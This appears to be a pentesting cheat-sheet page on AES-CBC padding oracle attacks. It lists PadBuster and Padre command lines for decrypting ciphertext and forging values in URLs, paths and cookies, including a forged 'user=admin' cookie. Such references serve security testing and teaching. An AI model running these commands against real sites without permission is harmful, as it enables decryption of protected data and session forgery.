# AES-CBC Padding Oracle Attack

### Automation <a href="#automation" id="automation"></a>

#### PadBuster <a href="#padbuster" id="padbuster"></a>

[PadBuster](https://github.com/AonCyberLabs/PadBuster) is an automated script for performing Padding Oracle attacks. It’s useful to decrypt AES.

```
# Encrypted Sample -> 2hN2bBPw==
# 16 -> Block site
# -encoding: 0->Base64, 1->Lower Hex, 2->Upper Hex, 3->NET UrlToken, 4->WebSafe Base64
padbuster https://vulnerable.com/?data=2hN2bBPw== 2hN2bBPw==  16 -encoding 0

# -bruteforce: Brute force against the first block
padbuster https://vulnerable.com/?data=2hN2bBPw== 2hN2bBPw== 16 -encoding 0 -bruteforce

# -cookies: specify cookie value
padbuster https://vulnerable.com/ 2hN2bBPw== 8 -encoding 0 -cookies "secret=2hN2bBPw=="

# -plaintext: specify plain text
padbuster https://vulnerable.com/ 2hN2bBPw== 8 -encoding 0 -cookies "secret=2hN2bBPw==" -plaintext "user=admin"
```

#### Padre <a href="#padre" id="padre"></a>

[Padre](https://github.com/glebarez/padre) is an advanced exploiter for Padding Oracle attacks against CBC mode encryption.

```
# Cookie
padre -u 'https://example.com/profile.php' -cookie 'SESS=$' 'ABCD=='

# Path
padre -u 'https://example.com/profile/$' 'ABCD=='

# -e: Specify encode type ('b64' or 'lhex')
padre -u 'https://example.com/profile/$' -e lhex '1234abcd...'

# -err: Error response contents pattern (regex)
padre -u 'https://example.com/profile/$' -err 'Error' 'ABCD=='
```